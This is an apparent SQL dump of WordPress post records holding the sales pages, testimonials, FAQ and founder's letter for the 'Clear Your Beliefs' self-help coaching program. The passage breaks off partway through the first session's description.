</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" rel="noopener">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" rel="noopener">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" rel="noopener">ConfusedAboutLove.com.</a>\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'closed', '', '1941-autosave-v1', '', '', '2017-08-25 13:35:45', '2017-08-25 18:35:45', '', 1941, 'http://clearyourbeliefs.com/1941-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2187, 2, '2015-05-21 14:33:09', '2015-05-21 19:33:09', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n</p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n<p>\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you 